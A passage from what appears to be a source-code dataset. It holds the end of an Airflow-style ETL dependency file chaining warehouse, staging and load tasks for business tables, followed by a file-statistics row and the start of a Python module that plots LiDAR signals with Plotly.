UH_WORKPLACE_MAPPING_STG.set_downstream(ODS_UH_WORKPLACE_MAPPING_LD)
ODS_UH_WORKPLACE_MAPPING_LD.set_downstream(UH_WORKPLACE_MAPPING)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_WORKLOCATION_WH)
ODS_UH_WORKLOCATION_WH.set_downstream(UH_WORKLOCATION_STG)
UH_WORKLOCATION_STG.set_downstream(ODS_UH_WORKLOCATION_LD)
ODS_UH_WORKLOCATION_LD.set_downstream(UH_WORKLOCATION)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_WORKLOCATION_MAPPING_WH)
ODS_UH_WORKLOCATION_MAPPING_WH.set_downstream(UH_WORKLOCATION_MAPPING_STG)
UH_WORKLOCATION_MAPPING_STG.set_downstream(ODS_UH_WORKLOCATION_MAPPING_LD)
ODS_UH_WORKLOCATION_MAPPING_LD.set_downstream(UH_WORKLOCATION_MAPPING)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_DEPTABBRE_BU_MAPPING_WH)
ODS_UH_DEPTABBRE_BU_MAPPING_WH.set_downstream(UH_DEPTABBRE_BU_MAPPING_STG)
UH_DEPTABBRE_BU_MAPPING_STG.set_downstream(ODS_UH_DEPTABBRE_BU_MAPPING_LD)
ODS_UH_DEPTABBRE_BU_MAPPING_LD.set_downstream(UH_DEPTABBRE_BU_MAPPING)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_DEPTABBRE_WH)
ODS_UH_DEPTABBRE_WH.set_downstream(UH_DEPTABBRE_STG)
UH_DEPTABBRE_STG.set_downstream(ODS_UH_DEPTABBRE_LD)
ODS_UH_DEPTABBRE_LD.set_downstream(UH_DEPTABBRE)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_DEPTUNIT_MAPPING_WH)
ODS_UH_DEPTUNIT_MAPPING_WH.set_downstream(UH_DEPTUNIT_MAPPING_STG)
UH_DEPTUNIT_MAPPING_STG.set_downstream(ODS_UH_DEPTUNIT_MAPPING_LD)
ODS_UH_DEPTUNIT_MAPPING_LD.set_downstream(UH_DEPTUNIT_MAPPING)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_PERSONNEL_CATEGORY_WH)
ODS_UH_PERSONNEL_CATEGORY_WH.set_downstream(UH_PERSONNEL_CATEGORY_STG)
UH_PERSONNEL_CATEGORY_STG.set_downstream(ODS_UH_PERSONNEL_CATEGORY_LD)
ODS_UH_PERSONNEL_CATEGORY_LD.set_downstream(UH_PERSONNEL_CATEGORY)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_PERSONNEL_CATEGORY_MAPPING_WH)
ODS_UH_PERSONNEL_CATEGORY_MAPPING_WH.set_downstream(UH_PERSONNEL_CATEGORY_MAPPING_STG)
UH_PERSONNEL_CATEGORY_MAPPING_STG.set_downstream(ODS_UH_PERSONNEL_CATEGORY_MAPPING_LD)
ODS_UH_PERSONNEL_CATEGORY_MAPPING_LD.set_downstream(UH_PERSONNEL_CATEGORY_MAPPING)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_PERSONNEL_SUBCATE_MAPPING_WH)
ODS_UH_PERSONNEL_SUBCATE_MAPPING_WH.set_downstream(UH_PERSONNEL_SUBCATE_MAPPING_STG)
UH_PERSONNEL_SUBCATE_MAPPING_STG.set_downstream(ODS_UH_PERSONNEL_SUBCATE_MAPPING_LD)
ODS_UH_PERSONNEL_SUBCATE_MAPPING_LD.set_downstream(UH_PERSONNEL_SUBCATE_MAPPING)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_EMPLOYMENTTYPE_MAPPING_WH)
ODS_UH_EMPLOYMENTTYPE_MAPPING_WH.set_downstream(UH_EMPLOYMENTTYPE_MAPPING_STG)
UH_EMPLOYMENTTYPE_MAPPING_STG.set_downstream(ODS_UH_EMPLOYMENTTYPE_MAPPING_LD)
ODS_UH_EMPLOYMENTTYPE_MAPPING_LD.set_downstream(UH_EMPLOYMENTTYPE_MAPPING)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_STAFFSTATUS_WH)
ODS_UH_STAFFSTATUS_WH.set_downstream(UH_STAFFSTATUS_STG)
UH_STAFFSTATUS_STG.set_downstream(ODS_UH_STAFFSTATUS_LD)
ODS_UH_STAFFSTATUS_LD.set_downstream(UH_STAFFSTATUS)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_STAFFSTATUS_TOBE_ONBOARD_WH)
ODS_UH_STAFFSTATUS_TOBE_ONBOARD_WH.set_downstream(UH_STAFFSTATUS_TOBE_ONBOARD_STG)
UH_STAFFSTATUS_TOBE_ONBOARD_STG.set_downstream(ODS_UH_STAFFSTATUS_TOBE_ONBOARD_LD)
ODS_UH_STAFFSTATUS_TOBE_ONBOARD_LD.set_downstream(UH_STAFFSTATUS_TOBE_ONBOARD)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_GRADE_MAPPING_WH)
ODS_UH_GRADE_MAPPING_WH.set_downstream(UH_GRADE_MAPPING_STG)
UH_GRADE_MAPPING_STG.set_downstream(ODS_UH_GRADE_MAPPING_LD)
ODS_UH_GRADE_MAPPING_LD.set_downstream(UH_GRADE_MAPPING)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_EDUCATION_MAPPING_WH)
ODS_UH_EDUCATION_MAPPING_WH.set_downstream(UH_EDUCATION_MAPPING_STG)
UH_EDUCATION_MAPPING_STG.set_downstream(ODS_UH_EDUCATION_MAPPING_LD)
ODS_UH_EDUCATION_MAPPING_LD.set_downstream(UH_EDUCATION_MAPPING)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_MFG.ODS_UM_RiskShipmentUpload_WH
proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UM_RiskShipmentUpload_WH)
ODS_UM_RiskShipmentUpload_WH.set_downstream(UM_RiskShipmentUpload_STG)
UM_RiskShipmentUpload_STG.set_downstream(ODS_UM_RiskShipmentUpload_LD)
ODS_UM_RiskShipmentUpload_LD.set_downstream(UM_RiskShipmentUpload)
proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UM_SMT_TIME_WH)
ODS_UM_SMT_TIME_WH.set_downstream(UM_SMT_TIME_STG)
UM_SMT_TIME_STG.set_downstream(ODS_UM_SMT_TIME_LD)
ODS_UM_SMT_TIME_LD.set_downstream(UM_SMT_TIME)
proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UM_SMT_WH)
ODS_UM_SMT_WH.set_downstream(UM_SMT_STG)
UM_SMT_STG.set_downstream(ODS_UM_SMT_LD)
ODS_UM_SMT_LD.set_downstream(UM_SMT)
proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UM_ForecastUploadModel_WH)
ODS_UM_ForecastUploadModel_WH.set_downstream(UM_ForecastUploadModel_STG)
UM_ForecastUploadModel_STG.set_downstream(ODS_UM_ForecastUploadModel_LD)
ODS_UM_ForecastUploadModel_LD.set_downstream(UM_ForecastUploadModel)
proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UM_Shift_WH)
ODS_UM_Shift_WH.set_downstream(UM_Shift_STG)
UM_Shift_STG.set_downstream(ODS_UM_Shift_LD)
ODS_UM_Shift_LD.set_downstream(UM_Shift)
proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UM_Resource_Mapping_Process_WH)
ODS_UM_Resource_Mapping_Process_WH.set_downstream(UM_Resource_Mapping_Process_STG)
UM_Resource_Mapping_Process_STG.set_downstream(ODS_UM_Resource_Mapping_Process_LD)
ODS_UM_Resource_Mapping_Process_LD.set_downstream(UM_Resource_Mapping_Process)
proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UM_Work_in_Process_Category_WH)
ODS_UM_Work_in_Process_Category_WH.set_downstream(UM_Work_in_Process_Category_STG)
UM_Work_in_Process_Category_STG.set_downstream(ODS_UM_Work_in_Process_Category_LD)
ODS_UM_Work_in_Process_Category_LD.set_downstream(UM_Work_in_Process_Category)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_PRD.ODS_UP_consign_vendor_prod_map_WH
proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UP_consign_vendor_prod_map_WH)
ODS_UP_consign_vendor_prod_map_WH.set_downstream(UP_consign_vendor_prod_map_STG)
UP_consign_vendor_prod_map_STG.set_downstream(ODS_UP_consign_vendor_prod_map_LD)
ODS_UP_consign_vendor_prod_map_LD.set_downstream(UP_consign_vendor_prod_map)
proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UP_Expense_Budget_prod_map_WH)
ODS_UP_Expense_Budget_prod_map_WH.set_downstream(UP_Expense_Budget_prod_map_STG)
UP_Expense_Budget_prod_map_STG.set_downstream(ODS_UP_Expense_Budget_prod_map_LD)
ODS_UP_Expense_Budget_prod_map_LD.set_downstream(UP_Expense_Budget_prod_map)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_QAM.ODS_UQ_MtlScrapCost_WH
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_MtlScrapCost_WH)
ODS_UQ_MtlScrapCost_WH.set_downstream(UQ_MtlScrapCost_STG)
UQ_MtlScrapCost_STG.set_downstream(ODS_UQ_MtlScrapCost_LD)
ODS_UQ_MtlScrapCost_LD.set_downstream(UQ_MtlScrapCost)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_CSDCustomerPaidService_WH)
ODS_UQ_CSDCustomerPaidService_WH.set_downstream(UQ_CSDCustomerPaidService_STG)
UQ_CSDCustomerPaidService_STG.set_downstream(ODS_UQ_CSDCustomerPaidService_LD)
ODS_UQ_CSDCustomerPaidService_LD.set_downstream(UQ_CSDCustomerPaidService)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_CSDPlannedShippingQty_WH)
ODS_UQ_CSDPlannedShippingQty_WH.set_downstream(UQ_CSDPlannedShippingQty_STG)
UQ_CSDPlannedShippingQty_STG.set_downstream(ODS_UQ_CSDPlannedShippingQty_LD)
ODS_UQ_CSDPlannedShippingQty_LD.set_downstream(UQ_CSDPlannedShippingQty)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_InventoryOwner_WH)
ODS_UQ_InventoryOwner_WH.set_downstream(UQ_InventoryOwner_STG)
UQ_InventoryOwner_STG.set_downstream(ODS_UQ_InventoryOwner_LD)
ODS_UQ_InventoryOwner_LD.set_downstream(UQ_InventoryOwner)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_OnSiteReworkQty_WH)
ODS_UQ_OnSiteReworkQty_WH.set_downstream(UQ_OnSiteReworkQty_STG)
UQ_OnSiteReworkQty_STG.set_downstream(ODS_UQ_OnSiteReworkQty_LD)
ODS_UQ_OnSiteReworkQty_LD.set_downstream(UQ_OnSiteReworkQty)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_QualityReturnQty_WH)
ODS_UQ_QualityReturnQty_WH.set_downstream(UQ_QualityReturnQty_STG)
UQ_QualityReturnQty_STG.set_downstream(ODS_UQ_QualityReturnQty_LD)
ODS_UQ_QualityReturnQty_LD.set_downstream(UQ_QualityReturnQty)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_JQMList_WH)
ODS_UQ_JQMList_WH.set_downstream(UQ_JQMList_STG)
UQ_JQMList_STG.set_downstream(ODS_UQ_JQMList_LD)
ODS_UQ_JQMList_LD.set_downstream(UQ_JQMList)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_IQC_DailyManpower_S1_WH)
ODS_UQ_IQC_DailyManpower_S1_WH.set_downstream(UQ_IQC_DailyManpower_S1_STG)
UQ_IQC_DailyManpower_S1_STG.set_downstream(ODS_UQ_IQC_DailyManpower_S1_LD)
ODS_UQ_IQC_DailyManpower_S1_LD.set_downstream(UQ_IQC_DailyManpower_S1)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_IQC_DailyManpower_NQJ_WH)
ODS_UQ_IQC_DailyManpower_NQJ_WH.set_downstream(UQ_IQC_DailyManpower_NQJ_STG)
UQ_IQC_DailyManpower_NQJ_STG.set_downstream(ODS_UQ_IQC_DailyManpower_NQJ_LD)
ODS_UQ_IQC_DailyManpower_NQJ_LD.set_downstream(UQ_IQC_DailyManpower_NQJ)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_IQC_DailyManpower_NYC_WH)
ODS_UQ_IQC_DailyManpower_NYC_WH.set_downstream(UQ_IQC_DailyManpower_NYC_STG)
UQ_IQC_DailyManpower_NYC_STG.set_downstream(ODS_UQ_IQC_DailyManpower_NYC_LD)
ODS_UQ_IQC_DailyManpower_NYC_LD.set_downstream(UQ_IQC_DailyManpower_NYC)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_IQC_DailyManpower_NQX_WH)
ODS_UQ_IQC_DailyManpower_NQX_WH.set_downstream(UQ_IQC_DailyManpower_NQX_STG)
UQ_IQC_DailyManpower_NQX_STG.set_downstream(ODS_UQ_IQC_DailyManpower_NQX_LD)
ODS_UQ_IQC_DailyManpower_NQX_LD.set_downstream(UQ_IQC_DailyManpower_NQX)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_IQC_DailyManpower_NVN_WH)
ODS_UQ_IQC_DailyManpower_NVN_WH.set_downstream(UQ_IQC_DailyManpower_NVN_STG)
UQ_IQC_DailyManpower_NVN_STG.set_downstream(ODS_UQ_IQC_DailyManpower_NVN_LD)
ODS_UQ_IQC_DailyManpower_NVN_LD.set_downstream(UQ_IQC_DailyManpower_NVN)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_IQC_DailyManpower_S2_WH)
ODS_UQ_IQC_DailyManpower_S2_WH.set_downstream(UQ_IQC_DailyManpower_S2_STG)
UQ_IQC_DailyManpower_S2_STG.set_downstream(ODS_UQ_IQC_DailyManpower_S2_LD)
ODS_UQ_IQC_DailyManpower_S2_LD.set_downstream(UQ_IQC_DailyManpower_S2)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_InventoryOwnerList_WH)
ODS_UQ_InventoryOwnerList_WH.set_downstream(UQ_InventoryOwnerList_STG)
UQ_InventoryOwnerList_STG.set_downstream(ODS_UQ_InventoryOwnerList_LD)
ODS_UQ_InventoryOwnerList_LD.set_downstream(UQ_InventoryOwnerList)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_MoPartType_WH)
ODS_UQ_MoPartType_WH.set_downstream(UQ_MoPartType_STG)
UQ_MoPartType_STG.set_downstream(ODS_UQ_MoPartType_LD)
ODS_UQ_MoPartType_LD.set_downstream(UQ_MoPartType)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_Escape_WH)
ODS_UQ_Escape_WH.set_downstream(UQ_Escape_STG)
UQ_Escape_STG.set_downstream(ODS_UQ_Escape_LD)
ODS_UQ_Escape_LD.set_downstream(UQ_Escape)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_SCM.ODS_US_reason_code_WH
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_US_reason_code_WH)
ODS_US_reason_code_WH.set_downstream(US_reason_code_STG)
US_reason_code_STG.set_downstream(ODS_US_reason_code_LD)
ODS_US_reason_code_LD.set_downstream(US_reason_code)
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_US_scrap_reason_code_WH)
ODS_US_scrap_reason_code_WH.set_downstream(US_scrap_reason_code_STG)
US_scrap_reason_code_STG.set_downstream(ODS_US_scrap_reason_code_LD)
ODS_US_scrap_reason_code_LD.set_downstream(US_scrap_reason_code)
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_US_BOM_PRODUCT_LIST_WH)
ODS_US_BOM_PRODUCT_LIST_WH.set_downstream(US_BOM_PRODUCT_LIST_STG)
US_BOM_PRODUCT_LIST_STG.set_downstream(ODS_US_BOM_PRODUCT_LIST_LD)
ODS_US_BOM_PRODUCT_LIST_LD.set_downstream(US_BOM_PRODUCT_LIST)
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_US_POTransfer_WH)
ODS_US_POTransfer_WH.set_downstream(US_POTransfer_STG)
US_POTransfer_STG.set_downstream(ODS_US_POTransfer_LD)
ODS_US_POTransfer_LD.set_downstream(US_POTransfer)
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_US_ExcessonHandTransfer_WH)
ODS_US_ExcessonHandTransfer_WH.set_downstream(US_ExcessonHandTransfer_STG)
US_ExcessonHandTransfer_STG.set_downstream(ODS_US_ExcessonHandTransfer_LD)
ODS_US_ExcessonHandTransfer_LD.set_downstream(US_ExcessonHandTransfer)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: W_ODS_QAM.ODS_UQ_FaultInjectionRecord_WH
proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_FaultInjectionRecord_WH)
ODS_UQ_FaultInjectionRecord_WH.set_downstream(UQ_FaultInjectionRecord_STG)
UQ_FaultInjectionRecord_STG.set_downstream(ODS_UQ_FaultInjectionRecord_LD)
ODS_UQ_FaultInjectionRecord_LD.set_downstream(UQ_FaultInjectionRecord)
proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_QSCANTrackingRecord_WH)
ODS_UQ_QSCANTrackingRecord_WH.set_downstream(UQ_QSCANTrackingRecord_STG)
UQ_QSCANTrackingRecord_STG.set_downstream(ODS_UQ_QSCANTrackingRecord_LD)
ODS_UQ_QSCANTrackingRecord_LD.set_downstream(UQ_QSCANTrackingRecord)
proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_ModelMPInfo_WH)
ODS_UQ_ModelMPInfo_WH.set_downstream(UQ_ModelMPInfo_STG)
UQ_ModelMPInfo_STG.set_downstream(ODS_UQ_ModelMPInfo_LD)
ODS_UQ_ModelMPInfo_LD.set_downstream(UQ_ModelMPInfo)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: M_ODS_CUS.ODS_UC_Customer_Grouping_Map_WH
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Customer_Grouping_Map_WH)
ODS_UC_Customer_Grouping_Map_WH.set_downstream(UC_Customer_Grouping_Map_STG)
UC_Customer_Grouping_Map_STG.set_downstream(ODS_UC_Customer_Grouping_Map_LD)
ODS_UC_Customer_Grouping_Map_LD.set_downstream(UC_Customer_Grouping_Map)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Group_Customer_Location_WH)
ODS_UC_Group_Customer_Location_WH.set_downstream(UC_Group_Customer_Location_STG)
UC_Group_Customer_Location_STG.set_downstream(ODS_UC_Group_Customer_Location_LD)
ODS_UC_Group_Customer_Location_LD.set_downstream(UC_Group_Customer_Location)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Project_Decision_Customer_WH)
ODS_UC_Project_Decision_Customer_WH.set_downstream(UC_Project_Decision_Customer_STG)
UC_Project_Decision_Customer_STG.set_downstream(ODS_UC_Project_Decision_Customer_LD)
ODS_UC_Project_Decision_Customer_LD.set_downstream(UC_Project_Decision_Customer)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_NA_Customer_Sub_Group_WH)
ODS_UC_NA_Customer_Sub_Group_WH.set_downstream(UC_NA_Customer_Sub_Group_STG)
UC_NA_Customer_Sub_Group_STG.set_downstream(ODS_UC_NA_Customer_Sub_Group_LD)
ODS_UC_NA_Customer_Sub_Group_LD.set_downstream(UC_NA_Customer_Sub_Group)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Group_Customer_Industry_Type_WH)
ODS_UC_Group_Customer_Industry_Type_WH.set_downstream(UC_Group_Customer_Industry_Type_STG)
UC_Group_Customer_Industry_Type_STG.set_downstream(ODS_UC_Group_Customer_Industry_Type_LD)
ODS_UC_Group_Customer_Industry_Type_LD.set_downstream(UC_Group_Customer_Industry_Type)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Global_Telecom_Operator_WH)
ODS_UC_Global_Telecom_Operator_WH.set_downstream(UC_Global_Telecom_Operator_STG)
UC_Global_Telecom_Operator_STG.set_downstream(ODS_UC_Global_Telecom_Operator_LD)
ODS_UC_Global_Telecom_Operator_LD.set_downstream(UC_Global_Telecom_Operator)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Product_Mapping_Table_WH)
ODS_UC_Product_Mapping_Table_WH.set_downstream(UC_Product_Mapping_Table_STG)
UC_Product_Mapping_Table_STG.set_downstream(ODS_UC_Product_Mapping_Table_LD)
ODS_UC_Product_Mapping_Table_LD.set_downstream(UC_Product_Mapping_Table)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Market_Share_Market_Shipment_WH)
ODS_UC_Market_Share_Market_Shipment_WH.set_downstream(UC_Market_Share_Market_Shipment_STG)
UC_Market_Share_Market_Shipment_STG.set_downstream(ODS_UC_Market_Share_Market_Shipment_LD)
ODS_UC_Market_Share_Market_Shipment_LD.set_downstream(UC_Market_Share_Market_Shipment)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_WNC_BI_SHIPMENT_QTY_TABLE_WH)
ODS_UC_WNC_BI_SHIPMENT_QTY_TABLE_WH.set_downstream(UC_WNC_BI_SHIPMENT_QTY_TABLE_STG)
UC_WNC_BI_SHIPMENT_QTY_TABLE_STG.set_downstream(ODS_UC_WNC_BI_SHIPMENT_QTY_TABLE_LD)
ODS_UC_WNC_BI_SHIPMENT_QTY_TABLE_LD.set_downstream(UC_WNC_BI_SHIPMENT_QTY_TABLE)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Product_Segment_Map_table_WH)
ODS_UC_Product_Segment_Map_table_WH.set_downstream(UC_Product_Segment_Map_table_STG)
UC_Product_Segment_Map_table_STG.set_downstream(ODS_UC_Product_Segment_Map_table_LD)
ODS_UC_Product_Segment_Map_table_LD.set_downstream(UC_Product_Segment_Map_table)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Market_Tam_Product_Map_WH)
ODS_UC_Market_Tam_Product_Map_WH.set_downstream(UC_Market_Tam_Product_Map_STG)
UC_Market_Tam_Product_Map_STG.set_downstream(ODS_UC_Market_Tam_Product_Map_LD)
ODS_UC_Market_Tam_Product_Map_LD.set_downstream(UC_Market_Tam_Product_Map)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: Y_ODS_CUS.ODS_UC_SW_Centric_Product_Model_WH
proxy_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_SW_Centric_Product_Model_WH)
ODS_UC_SW_Centric_Product_Model_WH.set_downstream(UC_SW_Centric_Product_Model_STG)
UC_SW_Centric_Product_Model_STG.set_downstream(ODS_UC_SW_Centric_Product_Model_LD)
ODS_UC_SW_Centric_Product_Model_LD.set_downstream(UC_SW_Centric_Product_Model)
| 34.843759 | 199 | 0.77555 | 37,225 | 241,746 | 4.433015 | 0.012169 | 0.053521 | 0.023512 | 0.041147 | 0.962435 | 0.952733 | 0.920882 | 0.900708 | 0.858737 | 0.832395 | 0 | 0.002154 | 0.126124 | 241,746 | 6,937 | 200 | 34.848782 | 0.778979 | 0.064849 | 0 | 0.512431 | 1 | 0.014799 | 0.261124 | 0.165401 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008485 | false | 0 | 0.00296 | 0 | 0.036504 | 0.000197 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8890eb63e609471e4e17752ae611f4da0ade1d46 | 6,818 | py | Python | utils/plotly_plot.py | FedeVerstraeten/smnar-lidar-dashboard | 5b188e70c1e2cf2a1bd1d84186043b2bf211919e | [
"MIT"
] | null | null | null | utils/plotly_plot.py | FedeVerstraeten/smnar-lidar-dashboard | 5b188e70c1e2cf2a1bd1d84186043b2bf211919e | [
"MIT"
] | 1 | 2021-10-06T05:02:18.000Z | 2021-10-06T05:02:18.000Z | utils/plotly_plot.py | FedeVerstraeten/smnar-lidar-dashboard | 5b188e70c1e2cf2a1bd1d84186043b2bf211919e | [
"MIT"
] | null | null | null | import dateutil
import datetime
import plotly
import plotly.graph_objects as go
from plotly.subplots import make_subplots
import plotly.express as px
import pandas as pd
import json
#-----------
# LiDAR
#-----------
def plotly_lidar_signal(lidar_signal,limit_init,limit_final):
# meters to bins
bin_init = int(limit_init/7.5)
bin_final = int(limit_final/7.5)
df=pd.DataFrame({
'meters':lidar_signal.range[bin_init:bin_final],
'TR0_500mV':lidar_signal.raw_signal[bin_init:bin_final],
})
df.index=df['meters']
fig = px.line(df,
x=df.index,
y=df['TR0_500mV'],
title='LiDAR raw signal')
# Set axes titles
fig.update_xaxes(rangeslider_visible=True,title_text="Height [m]")
fig.update_yaxes(title_text="TR0 Raw [mV]",)
fig.update_layout(width=1200, height=500)
plot_json = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)
return plot_json
def plotly_lidar_range_correction(lidar_signal,limit_init,limit_final):
# meters to bins
bin_init = int(limit_init/7.5)
bin_final = int(limit_final/7.5)
df=pd.DataFrame({
'meters':lidar_signal.range[bin_init:bin_final],
'TR0_500mV':lidar_signal.rc_signal[bin_init:bin_final],
'TR0_500mV_RF':lidar_signal.adj_factor*lidar_signal.pr2_mol[bin_init:bin_final]
})
df.index=df['meters']
fig = go.Figure()
fig = make_subplots() # rayleigh-fit secondary curve?
#fig = make_subplots(specs=[[{"secondary_y": True}]]) # rayleigh-fit secondary curve?
# Adding traces
fig.add_trace(
go.Scatter(
x=df.index,
y=df["TR0_500mV"],
mode="lines",
name="TR0 500mV",
marker_color='#39ac39',
opacity=1
),
secondary_y=False
)
fig.add_trace(
go.Scatter(
x=df.index,
y=df["TR0_500mV_RF"],
mode="lines",
name="TR0 500mV RF",
marker_color='#b23434',
opacity=0.7
),
secondary_y=False
)
# Add figure title
fig.update_layout(legend=dict(
orientation="h",
yanchor="bottom",
y=1.02,
xanchor="right",
x=0.93),
title={
'text': '<span style="font-size: 20px;">Range corrected LiDAR signal </span><br><span style="font-size: 10px;">(click and drag)</span>',
'y': 0.97,
'x': 0.45,
'xanchor': 'center',
'yanchor': 'top'},
paper_bgcolor="#ffffff",
plot_bgcolor="#ffffff",
width=640, height=480
# width=800, height=600
)
# display rayleigh-fit range
fig.add_vrect(x0=lidar_signal.fit_init, x1=lidar_signal.fit_final, line_width=0, fillcolor="red", opacity=0.2)
# Set x-axis title
#fig.update_xaxes(tickangle=45,rangeslider_visible=True)
fig.update_xaxes(tickangle=45,title_text="Height [m]")
# Set y-axes titles
fig.update_yaxes(title_text="TR0 RC [mV x m^2] ",
secondary_y=False, showgrid=False)
fig.update_yaxes(title_text="TR0 RC 500mV RF", tickangle=45,
secondary_y=True, showgrid=False)
plot_json = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)
return plot_json
def plotly_empty_signal(signal_type):
BIN_LONG_TRANCE = 4000
empty_signal = [0] * BIN_LONG_TRANCE
plot_json = {}
if signal_type == "raw":
df = pd.DataFrame(empty_signal)
df.reset_index(inplace=True)
df.columns=["bin","TR0_500mV"]
fig = px.line(df,
x='bin',
y=['TR0_500mV'],
title='LiDAR raw signal')
fig.update_xaxes(rangeslider_visible=True)
fig.update_layout(width=1200, height=500)
plot_json = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)
elif signal_type =="rms":
df = pd.DataFrame(empty_signal)
df.reset_index(inplace=True)
df.columns=["sample","rms_error"]
fig = go.Figure(data=go.Scatter(
x=df['sample'],
y=df["rms_error"],
mode="lines",
name="RMS error",
# title="RMS TMS",
marker_color='#b23434',
opacity=1
))
fig.update_layout(
width=640,
height=480,
title={
'text': '<span style="font-size: 20px;">RMS Error</span>',
'y': 0.97,
'x': 0.45,
'xanchor': 'center',
'yanchor': 'top'}
)
# Set x-axes titles
